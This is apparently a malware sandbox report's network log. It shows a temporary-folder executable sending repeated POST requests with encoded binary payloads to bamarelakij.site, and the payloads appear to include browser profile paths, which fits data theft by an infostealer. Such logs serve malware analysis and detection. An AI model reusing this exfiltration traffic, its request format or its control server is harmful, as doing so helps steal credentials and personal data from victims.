                                                                                                                                                                2025-01-09 13:43:00 UTC9953OUTData Raw: 00 00 00 00 03 00 00 00 fd ff ff ff 00 00 00 00 92 00 01 0f 00 00 00 a6 26 00 00 eb bf 07 33 08 00 00 00 47 36 dd 17 a6 c9 98 95 00 00 00 00 08 00 00 00 d7 7f 0e 66 00 00 00 00 27 81 00 21 00 00 00 00 e4 4c 00 00 d7 7f 0e 66 00 00 00 00 a0 96 06 08 5a 00 00 10 10 00 3e 56 92 b2 a4 c7 1a b9 ff ff ff ff ff ff ff ff 34 00 28 00 8e e4 c2 c4 c4 ca e4 b8 c8 ca e6 b8 82 a2 a4 8c 8a ac a4 a8 8e 98 5c d4 e0 ce 02 00 20 00 04 08 00 00 00 00 00 00 0e 08 00 00 00 00 00 00 02 04 08 fb f7 82 a2 a4 8c 8a ac a4 a8 8e 98 a4 a0 9c ac aa 9a 82 9a 90 a8 b2 8a a8 8a ac 8e 88 8a 9c 90 8a 90 b4 88 82 a2 a4 b0 b4 a2 86 88 90 90 98 a8 aa b4 92 8a 94 a4 86 a2 8e 8e a0 a4 a2 ae 84 92 b2 ae 82 88 ae 94 8a b4 a8 82 8a 98 8a a4 96 b4 aa 88 b4 94 90 a6 8c ac 92 aa a0 84 a8 94 ac 8e 96
                                                                                                                                                                Data Ascii: &3G6f'!LfZ>V4(\
                                                                                                                                                                2025-01-09 13:43:01 UTC817INHTTP/1.1 204 No Content
                                                                                                                                                                Date: Thu, 09 Jan 2025 13:43:01 GMT
                                                                                                                                                                Connection: close
                                                                                                                                                                pid: 1V/P0mPQQSCTS08rUK676SzNB/ZpQ2o6hGfMU4k1Y8Y86gb2rF0ak7cf4BYAW0D4A9tKmQjRguuH
                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vL9kF5N8N0oX%2F0BEh88C0ZW4p4qMYa9ePY%2F62XADzmW4P5PI9RajIajuzx%2FKUlbBWVC2Edg4hbQ3Mlg%2Bjw%2BCgDdOWG5RAGiThgh9QyRjNoOsZp23K%2Bd3UJjIL6i6UtEXMMGS"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8ff4da977fbf42e3-EWR
                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1562&min_rtt=1552&rtt_var=603&sent=7&recv=15&lost=0&retrans=0&sent_bytes=2838&recv_bytes=11047&delivery_rate=1783750&cwnd=209&unsent_bytes=0&cid=2ab3d9867a9fdb60&ts=294&x=0"


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                23192.168.2.750089104.21.80.524436224C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2025-01-09 13:43:02 UTC437OUTPOST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Accept: */*
                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
                                                                                                                                                                p: 1V/P0mPQQSCTS08rUK676SzNB/ZpQ2o6hGfMU4k1Y8Y86gb2rF0ak7cf4BYAW0D4A9tKmQjRguuH
                                                                                                                                                                Content-Length: 70050
                                                                                                                                                                Host: bamarelakij.site
                                                                                                                                                                2025-01-09 13:43:02 UTC15331OUTData Raw: 00 00 00 00 03 00 00 00 fd ff ff ff 00 00 00 00 92 00 01 0f 00 00 00 67 11 01 00 54 2f 9d 2d 08 00 00 00 47 36 dd 17 a6 c9 98 95 00 00 00 00 a3 20 00 00 a8 5e 3b 5a 00 00 00 00 37 81 4d 66 6e 6c 68 70 66 53 cc e4 de dc e8 c8 ca e6 d6 27 14 00 9b 94 ca 23 25 9b 0a 00 9b 08 00 9f 00 00 00 02 ff e9 00 00 b3 4c 92 dc e8 ca d8 50 a4 52 40 86 de e4 ca 50 a8 9a 52 64 40 86 a0 aa 40 6c 6c 60 60 40 80 40 64 5c 68 60 40 8e 90 f4 23 7f 9a d2 c6 e4 de e6 de cc e8 40 84 c2 e6 d2 c6 40 88 d2 e6 e0 d8 c2 f2 40 82 c8 c2 e0 e8 ca e4 81 87 b9 00 a7 41 4d a6 f2 e6 e8 ca da 51 a4 ca ce d2 e6 e8 e4 f2 51 e6 da e6 e6 5c ca f0 ca 53 c6 e6 e4 e6 e6 5c ca f0 ca 57 ee d2 dc d2 dc d2 e8 5c ca f0 ca 53 c6 e6 e4 e6 e6 5c ca f0 ca 59 ee d2 dc d8 de ce de dc 5c ca f0 ca 59 e6 ca e4 ec
                                                                                                                                                                Data Ascii: gT/-G6 ^;Z7MfnlhpfS'#%LPR@PRd@@ll``@@d\h`@#@@@AMQQ\S\W\S\Y\Y
                                                                                                                                                                2025-01-09 13:43:02 UTC15331OUTData Raw: ec 3b 35 98 b2 64 b8 b6 65 ba 74 1c 5e 4a 77 36 f5 9d b7 76 84 ff 74 b3 50 7b 09 13 ed 53 b5 48 a4 69 42 65 85 47 f4 ee a0 46 5a dd d6 a5 db 15 ae 9b 01 f7 21 ad a5 10 50 f2 c1 59 ef 89 f6 6f a9 a9 be 5a 81 63 17 6b 7c 75 bf b0 ed 02 a7 37 6c 19 2e ae cf 13 35 a7 63 c3 e6 6a 19 6a dd b9 27 ee 57 b0 9e 89 be 97 9b 8d 8b b7 15 41 03 5e 95 07 32 0f d3 a4 8b b6 04 02 b8 a2 60 4d dd 5f 38 38 f8 ee 7d b9 3c 2d 4d 1a 2d 6f a2 14 88 06 ea 87 1f 25 4f b4 d9 72 1c 22 a7 3a 29 7a 21 b6 bf 3a 0d de a6 25 f3 66 41 d4 5a 91 f7 4e 20 61 2e a0 0f 8b 83 e3 4f dd b4 44 5d dd 85 fa b1 ea c8 49 c3 92 47 1f 9a 38 cb 21 6b ce ad fb 16 6a 99 f8 82 bd e2 e8 08 2b 5a 05 01 94 d2 5e 5f 13 c8 a1 14 f8 da 9a c5 95 43 c7 f1 61 67 3d fd 92 20 5f 80 00 6a 68 85 3e b1 06 16 f0 23 2d c7
                                                                                                                                                                Data Ascii: ;5det^Jw6vtP{SHiBeGFZ!PYoZck|u7l.5cjj'WA^2`M_88}<-M-o%Or":)z!:%fAZN a.OD]IG8!kj+Z^_Cag= _jh>#-
                                                                                                                                                                2025-01-09 13:43:02 UTC15331OUTData Raw: 21 58 95 f4 ec c1 d6 d1 da ae 71 9b e1 9a e5 33 d3 3a d5 65 d4 cd 48 e2 71 fa 70 7f 92 87 ee a9 2a e1 9c db 20 49 67 b0 fc 86 fc f0 cd 40 be c8 80 01 c2 3c 1a f8 64 7f 24 7f 9c da 6c 78 e6 21 79 cc 77 1f 08 28 cf 96 1e 81 76 68 4e 22 18 46 ae 77 75 ef 7f 3d 1a 06 c2 bf c0 d7 bb ab ce d9 19 9d 25 2b 15 cf de 7c b5 8f 0b 37 34 52 7b b2 17 be 8a 90 18 43 b4 9e 2e 62 3f 6f 5c 52 8e 17 67 af 1d 81 7d 4f 3d b1 39 01 60 08 6e 81 1a 6a 8b 49 46 25 86 ce cd 4e a0 a9 8d 15 a9 aa de ad b8 5c 4d 7a e4 07 8e d0 41 a0 f2 7f e6 3e 19 d3 23 fe 6d 59 25 fe 6d f9 ad 20 ed 32 54 b7 f2 05 d7 8b e9 3a 1a 19 4e 6f b7 d8 d0 24 d9 39 c4 bf 5e 9e 81 ea 62 76 d3 e6 62 76 d3 76 db 8c 00 cc a2 51 dd c9 6c 68 c0 bd 77 46 ce 1d 22 4f 7d 0e 13 a6 b1 c7 ce 0c c2 60 09 15 5e dc d7 9c d9
                                                                                                                                                                Data Ascii: !Xq3:eHqp* Ig@<d$lx!yw(vhN"Fwu=%+|74R{C.b?o\Rg}O=9`njIF%N\MzA>#mY%m 2T:No$9^bvbvvQlhwF"O}`^
                                                                                                                                                                2025-01-09 13:43:02 UTC15331OUTData Raw: c6 1e f0 12 c8 17 0f 8f dd f8 fb 95 bd fc a7 17 e9 1c fd 2f d7 e0 9d 64 2f b0 9c e5 cd 87 13 cc dd 52 c3 b1 0b bd 6b ce 0b df 69 8f c5 6a 04 b3 c4 d1 d6 18 31 5d 38 3c 60 15 ce b5 39 84 bb f3 8e 21 38 65 ba 48 53 99 8b c3 75 92 64 1d 6e e8 e8 76 e3 b1 be 70 9f c9 b3 1b 01 e5 a6 37 5b bf 30 93 35 72 d7 d7 7b d2 e1 c8 f1 b9 7f 2d d9 39 b8 d3 5e 48 7f f9 4c 22 de a2 74 9f bd f3 61 fc 74 b6 0b 84 fb a6 e3 d7 8e bf 75 dd ec 5a e7 40 b3 de c6 0e e3 bc cf 9a 31 93 a6 cb cb a6 93 2d a1 c3 b0 65 56 98 54 6f 45 d0 38 59 30 3b be a2 d7 2d 39 7d 97 d9 19 0c 15 31 56 dd 37 24 0a ee 28 78 1c 5a 8f 56 27 d1 86 a5 68 12 44 a4 16 f5 a3 80 02 e2 d3 36 8e 8a e0 da c9 a5 ba 7e fc d9 1b da 53 27 e8 b4 ef 43 0a 43 c9 a9 75 c3 df 56 cd f2 d9 07 9b a2 7d ed db c6 e5 eb 7a 1e 9b
                                                                                                                                                                Data Ascii: /d/Rkij1]8<`9!8eHSudnvp7[05r{-9^HL"tatuZ@1-eVToE8Y0;-9}1V7$(xZV'hD6~S'CCuV}z
                                                                                                                                                                2025-01-09 13:43:02 UTC8726OUTData Raw: 2c 1a 96 d3 ec 65 6d cd 26 50 2d f8 23 eb 19 52 7d 63 e9 b1 e0 78 d8 4b ed 10 de df 99 c6 83 e1 3c 68 92 62 29 44 c5 b5 86 18 61 5f 2f 52 ac 3c 3d f7 a6 9e 0f 4d 86 37 f7 b6 af a5 b2 7c cc 28 2e 3e 18 e2 f6 75 09 d4 b0 e0 9d 79 16 1f c1 13 61 22 79 7d ec 64 a9 52 8c 85 27 78 5a c8 9b 4a 4d 2d 48 d6 d2 7e c1 bf da 61 3c 82 ed 61 dc 94 c4 fa a4 ae 71 b2 bb 73 26 89 ff b0 88 13 87 4e 51 82 49 e3 37 46 eb e6 93 cf e2 e6 e2 d6 cc cb 0b 95 1c 22 06 08 dd 3f 49 85 bf fc 2a 8d bd e9 e1 d5 21 da 63 ec 2f 22 76 ac e3 3b f7 6c d8 be f0 2d 1d e9 10 5c 95 f6 57 b7 dc 24 61 90 d3 a7 83 56 58 8c e4 37 a6 8d 99 c9 a6 a4 b3 f6 56 47 0c 7b 01 7d 50 8f d6 07 d6 2f 39 e4 62 36 bf d6 b0 ee 66 fa 49 5a 60 bb e2 f4 99 a7 e5 4b 86 11 62 5e 7c 11 e6 5c bc 5b 01 d9 23 35 ca 81 3b
                                                                                                                                                                Data Ascii: ,em&P-#R}cxK<hb)Da_/R<=M7|(.>uya"y}dR'xZJM-H~a<aqs&NQI7F"?I*!c/"v;l-\W$aVX7VG{}P/9b6fIZ`Kb^|\[#5;
                                                                                                                                                                2025-01-09 13:43:03 UTC814INHTTP/1.1 204 No Content
                                                                                                                                                                Date: Thu, 09 Jan 2025 13:43:03 GMT
                                                                                                                                                                Connection: close
                                                                                                                                                                pid: 1V/P0mPQQSCTS08rUK676SzNB/ZpQ2o6hGfMU4k1Y8Y86gb2rF0ak7cf4BYAW0D4A9tKmQjRguuH
                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SD4rMPYrSYy9KSBgjShUWJVBR7%2By5JTeij3sXDvA0i6cpXbXEs3%2BgdMgLOY9t4iM4xUbWlpf3oofUcoavjl1n%2FWNaVgT3UYRkZuMDRQu0G8u8xJ8wEj5pvgBhOm%2BeFwflLUf"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8ff4daa36ae543ed-EWR
                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1621&min_rtt=1613&rtt_var=622&sent=30&recv=77&lost=0&retrans=0&sent_bytes=2838&recv_bytes=71321&delivery_rate=1733966&cwnd=210&unsent_bytes=0&cid=a8d0d8a2aa307cf4&ts=762&x=0"


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                24192.168.2.750090104.21.80.524436224C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2025-01-09 13:43:04 UTC434OUTPOST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Accept: */*
                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
                                                                                                                                                                p: 1V/P0mPQQSCTS08rUK676SzNB/ZpQ2o6hGfMU4k1Y8Y86gb2rF0ak7cf4BYAW0D4A9tKmQjRguuH
                                                                                                                                                                Content-Length: 35
                                                                                                                                                                Host: bamarelakij.site
                                                                                                                                                                2025-01-09 13:43:04 UTC35OUTData Raw: 00 00 00 00 03 00 00 00 fd ff ff ff 00 00 00 00 92 00 02 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                                Data Ascii:
                                                                                                                                                                2025-01-09 13:43:04 UTC730INHTTP/1.1 204 No Content
                                                                                                                                                                Date: Thu, 09 Jan 2025 13:43:04 GMT
                                                                                                                                                                Connection: close
                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aHwB%2Bdk%2B%2F526xuYdjAj36RXKLvIR3HGHWupaTrSSNsBjjIm9y8myOkB4Vgk5%2BaqCIdrkS7hZ4NjFcaDwjFf7s9QYbTCYggUxR4FWsnaXXBlWFby25nrCu%2BbzPJQ0BgM4OXD9"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8ff4daac1eef1875-EWR
                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1682&min_rtt=1638&rtt_var=702&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2837&recv_bytes=1105&delivery_rate=1465863&cwnd=153&unsent_bytes=0&cid=03e2382adf8820b9&ts=327&x=0"


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                25192.168.2.750091104.21.80.524433824C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2025-01-09 13:43:09 UTC438OUTPOST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Accept: */*
                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
                                                                                                                                                                p: 1V/P0mPQQSCTS08rUK676SzNB/ZpQ2o6hGfMU4k1Y8Y86gb2rF0ak7cf4BYAW0D4A9tKmQjRguuH
                                                                                                                                                                Content-Length: 132728
                                                                                                                                                                Host: bamarelakij.site
                                                                                                                                                                2025-01-09 13:43:09 UTC15331OUTData Raw: 00 00 00 00 03 00 00 00 fd ff ff ff 00 00 00 00 92 00 01 0f 00 00 00 f5 af 01 00 58 04 ce 1c 08 00 00 00 47 36 dd 17 a6 c9 98 95 00 00 00 00 2e 06 00 00 b0 08 9d 38 00 00 00 00 27 81 21 25 31 81 21 4d 86 d0 e4 de da ca b3 70 86 74 b8 aa e6 ca e4 e6 b8 cc e4 de dc e8 c8 ca e6 d6 b8 82 e0 e0 88 c2 e8 c2 b8 98 de c6 c2 d8 b8 8e de de ce d8 ca b8 86 d0 e4 de da ca b8 aa e6 ca e4 40 88 c2 e8 c2 23 33 81 21 4f 88 ca cc c2 ea d8 e8 b3 80 86 74 b8 aa e6 ca e4 e6 b8 cc e4 de dc e8 c8 ca e6 d6 b8 82 e0 e0 88 c2 e8 c2 b8 98 de c6 c2 d8 b8 8e de de ce d8 ca b8 86 d0 e4 de da ca b8 aa e6 ca e4 40 88 c2 e8 c2 b8 88 ca cc c2 ea d8 e8 b3 68 c6 d0 e4 de da d2 ea da be c4 e4 de ee e6 ca e4 e6 b8 86 d0 e4 de da ca b8 e0 e4 de cc d2 d8 ca e6 b8 88 ca cc c2 ea d8 e8 b8 98 de
                                                                                                                                                                Data Ascii: XG6.8'!%1!Mpt@#3!Ot@h
                                                                                                                                                                2025-01-09 13:43:09 UTC15331OUTData Raw: 8f 99 67 80 d7 34 7c c2 d2 26 3c 4c 4f 70 82 0a 15 64 74 bb 7f c9 91 55 e3 3d 86 6d 14 83 6c 20 a7 f4 b6 b6 d2 8c 65 d4 4d 03 d4 c8 b0 b4 19 aa e1 e3 f2 56 c5 52 95 ec c9 3d c4 5b 32 6d 59 91 bc 53 38 38 35 6c 1e e4 b0 14 55 b1 da d5 2d 25 e7 9c 0b 9b ac 47 09 20 d8 23 fb 1a 03 03 33 90 2d 88 28 62 bc cc 1a f1 a8 b7 1e 8d 6c d1 f6 ea 92 2b dc 92 ab 50 95 2d 4c c3 c4 f4 d8 b9 10 b5 83 f3 6c cd f3 e4 bf 23 4f 25 ed 22 56 e7 c3 c8 02 45 b3 0f 66 0c 59 d0 ab 95 61 61 de 26 14 1f fc 0c 81 b7 96 f4 3f fc 7b 4c 01 ef 58 6f de 03 96 78 6d 1e 20 5a 11 1f 22 7c 52 97 ae 13 49 a5 37 2a 86 31 c3 27 eb 5d fb 08 80 2e cc 47 4b 0f e9 ae 25 52 1a a9 86 8d 0d 84 f3 77 5c 45 1f 7b bb 88 bb d1 19 fc 32 6d 30 d3 4f 32 af f7 20 4c e2 2b cb 1b 63 92 22 e5 22 50 61 77 7d a1 ef
                                                                                                                                                                Data Ascii: g4|&<LOpdtU=ml eMVR=[2mYS885lU-%G #3-(bl+P-Ll#O%"VEfYaa&?{LXoxm Z"|RI7*1'].GK%Rw\E{2m0O2 L+c""Paw}
                                                                                                                                                                2025-01-09 13:43:09 UTC15331OUTData Raw: 3c aa d4 6c 38 68 b5 a0 c6 9b a9 43 ac 71 0d f3 09 d7 4a f8 d0 26 c6 7b ed 2d 8e 70 6b 94 d0 65 5b 6f 8a be e2 9a 43 9a bd 35 b6 4c 81 78 2a 90 8a 3d c7 c2 4f 02 d5 e7 c5 69 19 14 cb 0d ef 2c 6d 58 97 3a ec f4 f1 5a 7d 1a ae 9e 74 2d 6a c2 18 77 40 d4 43 35 94 f6 8d 78 ea f9 01 4f 14 58 00 8c 91 e8 76 4d c0 95 02 2a e1 28 38 a8 43 c5 79 e1 db 64 5f 17 bc c0 28 bd 3d b5 8f 3f 86 28 6b 4c a8 e3 f4 8c 66 59 90 c0 08 09 e6 31 c8 41 b4 6f b7 41 b2 e0 b4 6f f2 86 a4 e3 96 16 88 d6 2d e3 76 10 52 71 89 e0 62 73 dc c7 a6 cc 8b ad 5a 1e e8 62 4c 3f 16 3e a6 9d 62 7e 40 34 57 02 26 9d c4 8d 8c 9c db 85 81 8c 63 6a 06 68 32 ca 44 18 c0 c9 cc 63 72 54 50 41 b0 fc c0 67 16 df 60 41 31 a0 09 99 70 64 cf 6f f2 7a 4f 12 10 6c 6c a5 14 3d 6a 24 91 dc 04 a2 e6 2e 7e 53 20
                                                                                                                                                                Data Ascii: <l8hCqJ&{-pke[oC5Lx*=Oi,mX:Z}t-jw@C5xOXvM*(8Cyd_(=?(kLfY1AoAo-vRqbsZbL?>b~@4W&cjh2DcrTPAg`A1pdozOll=j$.~S
                                                                                                                                                                2025-01-09 13:43:09 UTC15331OUTData Raw: d2 04 c3 1b ec f2 75 66 7b 6f f9 8f 23 e0 45 40 e8 07 44 d9 92 04 7f c9 b9 19 4c 23 c5 f9 98 85 ed 02 51 ad 04 a1 98 24 7a a5 52 49 ba dc bc 44 48 be 17 28 cf f6 00 3b 71 19 e9 40 ac ad d2 bb 6c 38 0c 9a cb af 15 19 da 49 e1 80 b8 ba 4f b6 19 71 95 be cf 56 3e db 01 e0 b5 b4 2e 11 ab 16 f0 b5 b0 7b ba 01 98 01 c0 16 98 00 0c 6d 81 12 c4 eb 0c 04 64 a2 27 7e 80 4c 90 61 0a fd 7f c7 7b dd 52 04 df c6 0e 96 f5 ac 79 07 f4 40 e5 2b 88 d9 cc 69 b1 23 ce ac 27 2f 97 2e 6b fd 32 b5 f3 a6 ce 84 e9 49 7c 8c 14 05 44 7b a9 7f e2 93 5a a2 e5 0d 02 31 aa 34 3f ad b0 40 d0 ae 4d 8d 60 c7 2a d8 cf 69 77 8c ee f8 a1 c4 03 41 42 98 31 14 b0 05 86 ee 86 2c 7a fc 7d c5 8f 22 24 6b 85 cc ab 06 09 78 0e 81 4d 03 da 25 5d b2 ec 0a 3e 27 24 49 1a d9 a3 b7 93 5c b5 ff 86 47 ff
                                                                                                                                                                Data Ascii: uf{o#E@DL#Q$zRIDH(;q@l8IOqV>.{md'~La{Ry@+i#'/.k2I|D{Z14?@M`*iwAB1,z}"$kxM%]>'$I\G
                                                                                                                                                                2025-01-09 13:43:09 UTC15331OUTData Raw: e8 c2 e8 ca 02 00 20 00 3f 67 00 00 00 00 00 00 1b f0 00 00 00 00 00 00 5b fb d2 de d9 71 a5 40 18 fd 2b 0d 7e 9b 80 ec 4b ed 8b 81 66 30 db 53 5a 66 4a 4b ad fc 34 0d ed fa bf ea a2 ff fb 0a d9 e6 9c 73 d5 ac bb dd 3c 19 7e 39 27 48 07 83 c0 60 30 19 40 07 a9 7f bc 05 e0 33 15 6a f3 10 c5 61 dd 45 54 32 7e 25 72 91 bc bd be fd f7 0a c7 c2 18 4c 40 0d 09 50 21 47 a0 08 86 10 35 86 08 1d 83 80 25 80 0a 2c 84 20 3d c8 a0 34 08 22 24 c9 c2 34 4f 92 25 c9 e0 08 42 e2 03 01 92 cd 7f be bc bc be 85 63 b7 4d c8 f8 f2 ff af 9f 3f 3e c3 a4 a9 e3 8f 35 19 a6 a3 6b 5e df 5e 20 88 f9 0c fd 0c 07 50 ed 36 94 f9 a2 cb 4e 89 8e 2f fc a9 83 68 fe 98 92 a5 fc d8 f2 60 9e 3e da 65 fb 9a 8b 7f 03 f5 d1 07 58 f3 8f 6d fc fe fa 13 75 ec 5c b5 4b b6 4d 1f 4d 91 8d c0 fd 09 f7
                                                                                                                                                                Data Ascii: ?g[q@+~Kf0SZfJK4s<~9'H`0@3jaET2~%rL@P!G5%, =4"$4O%BcM?>5k^^ P6N/h`>eXmu\KMM
                                                                                                                                                                2025-01-09 13:43:09 UTC15331OUTData Raw: d3 8a f6 ac b7 1b 67 1d 21 dd 89 09 97 c0 ef e9 80 fd 82 bc 88 13 4b 43 76 77 bc ec 65 c0 36 7f 1a 8a 55 e9 9e d2 a6 72 7d 47 3f 58 9b 2d 0a 9b e5 25 85 a5 69 9c 66 3a 5b ca 68 9c e7 e1 f0 24 28 d6 4e db 73 05 e4 9a a7 58 fb 01 76 0f 9b ed 57 df c0 a0 c1 c0 6b d3 c0 41 df d8 74 40 03 33 90 d7 32 5a 92 18 5a ea 18 5b e8 18 a7 cc d1 5b 4c c3 37 94 66 69 ab 52 39 9f 73 02 8d b7 dc e6 62 c2 7d a6 70 cf 49 27 d4 f7 46 da 78 05 0c f5 2d ed 83 10 24 7b de d2 5d 3e 9c e5 56 5a a1 79 27 92 24 5a 94 79 d2 c2 59 46 ec b5 2e db 32 5a a3 3c 94 e7 68 3b a3 af da 9a 37 1d d3 66 0d fc c8 19 01 a5 d9 cb b7 3e db ca 58 3a c8 d8 ba 65 0e 3b db 90 0f 8d ed c7 d9 aa c3 24 99 0c c3 54 1f dc 77 65 33 5c a3 18 9a e7 33 ae 60 e8 8c e7 68 ba a1 b2 8d d4 4b 5c a3 59 69 90 da 9d 0e
                                                                                                                                                                Data Ascii: g!KCvwe6Ur}G?X-%if:[h$(NsXvWkAt@32ZZ[[L7fiR9sb}pI'Fx-${]>VZy'$ZyYF.2Z<h;7f>X:e;$Twe3\3`hK\Yi
                                                                                                                                                                2025-01-09 13:43:09 UTC15331OUTData Raw: ea e5 3e 3f 29 4a 83 9f 7f fe 05 ff d6 e1 d3 ae 5a 31 09 c0 04 fd cf b4 ea 2e 0a 3f 1e a3 4c db 37 91 f9 26 a8 a6 a9 93 68 ee da e5 e5 1c 82 89 7e 00 fb de 44 b4 ff 5a 8c ef 1f 35 7e bf bf fb 7f 5d ef db 12 c9 7f 81 48 3f 5e e1 fc fc 5d c9 8f f7 09 3e 83 f9 62 9b bb 4e e1 be c6 d6 ff b4 e7 5f be 0d 8f 41 7f cb fa 25 89 3e 93 38 c8 5e df 5e ff fb 65 e6 aa 08 bc 3f a8 08 4e aa b4 bc 20 32 81 ee e9 c1 aa 0e a0 b5 c6 05 dd 66 a7 74 07 62 97 ac 67 fb af fe ff 3a 73 ff 13 93 fe a7 b7 5a f1 19 90 3c 27 be bf fc fd f3 9a a9 5a 12 7e 6d 44 9d 25 5f de 00 2e a7 cf ae 05 7e c5 cb b7 4f a5 ff f1 34 f5 29 08 c6 29 fe e8 3f de 2a ff d7 4a 3a 27 2f ef fe fb fd f7 df 7f ff 7e a0 96 06 08 5a 00 00 10 10 00 3e 56 92 b2 30 9a 13 a2 ff ff ff ff ff ff ff ff 46 00 28 00 c6 d0
                                                                                                                                                                Data Ascii: >?)JZ1.?L7&h~DZ5~]H?^]>bN_A%>8^^e?N 2ftbg:sZ<'Z~mD%_.~O4))?*J:'/~Z>V0F(
                                                                                                                                                                2025-01-09 13:43:09 UTC15331OUTData Raw: 93 bc 96 5e a3 0b 4b 99 bb 27 37 c7 27 d1 76 c7 a5 89 a2 c8 89 47 48 d8 93 c8 0f ff 23 95 a8 75 2a 0b b4 12 6e e5 3c ec 4b ab 0e df 7a 2b e9 0b 1e bb 82 be 10 0f f7 84 7c d1 a9 e0 be 91 4e f0 f0 be 71 d7 d6 7f b7 c7 a7 3b 13 b5 5b d6 57 6e ad 5d 58 dc 0a 23 56 b4 e2 c8 29 d6 f5 b7 2c 7b 90 ae 34 ab 11 c4 be d3 bd ef 50 db 10 4c d4 f3 5d 2c 9b 91 a6 03 71 57 c4 3b 7b c3 c7 77 37 14 1b de 65 0b 8d 54 f3 0c ec ef 2c 66 22 bb 9b 8d 99 7d c0 cc ef 7b 2e 37 dc 8a cc ae cf ca 21 d8 14 32 ff 5d 24 d3 b5 fa 5d f5 03 18 36 da b3 91 0d d4 3b dc dc cd 9c 9a 28 e9 a5 da 33 1d fd ee a9 5d e5 09 bf 29 1b 83 4c 9e ff 0c ee 1d 3f 50 ae 5c be 6d 76 d3 df 80 75 12 a1 1d 07 c8 ce 4a b2 46 ef 49 23 46 05 3f 9d bb d1 22 13 39 0a da 45 b0 6c 29 71 47 ec 17 dc f1 41 8d d3 24 fd
                                                                                                                                                                Data Ascii: ^K'7'vGH#u*n<Kz+|Nq;[Wn]X#V),{4PL],qW;{w7eT,f"}{.7!2]$]6;(3])L?P\mvuJFI#F?"9El)qGA$
                                                                                                                                                                2025-01-09 13:43:09 UTC10080OUTData Raw: 5e 6d 58 7b 8a ce cc 5c 5b bf a0 8d bc f2 ce d2 f1 e3 da cc ca 43 b5 1d 37 93 cd 09 f6 dc a1 23 98 33 5a 35 df 4f ed 2c aa 7a 53 6f 35 c6 2f 0f 96 87 1f dd 13 2d ec dc 66 44 37 47 bf f2 27 a2 71 a3 3b 4e 17 16 e3 b1 a5 77 dd 5c 1a 3e 7c 38 5a 3b be fa 89 ad d4 51 8b 1b 70 13 d6 b6 8c fd e1 4d 0f dc a6 2d 95 d0 4b 64 b7 5b 5e 7e a8 d7 ec 9b b4 6a 13 9f 89 e7 5b 2f 64 77 f1 cd 07 e1 b1 e3 3e 5c 1c ff f1 c3 36 7a be 37 34 db 7e d0 37 45 0f be 37 7b 57 68 79 ce 9e e9 ee ec dc 7d a3 ea 03 77 6f 7f 63 36 7b 0e 65 de 67 fa 2b 33 96 37 bc 9c fb ee d6 fe 9d af da 50 7b 73 be 17 92 d5 92 46 bc ff 05 ba bd 6c ad db 88 66 5b 8c 5a dc ef 7f 94 39 37 f8 c3 b9 2c df 9b 5b bf 2d f7 ad cd c8 be 4b 67 b1 39 7c 37 a8 27 dd 9a 7d 26 5a 6c 4f 1f 9d aa 37 67 e3 a3 ac 6f 33 89
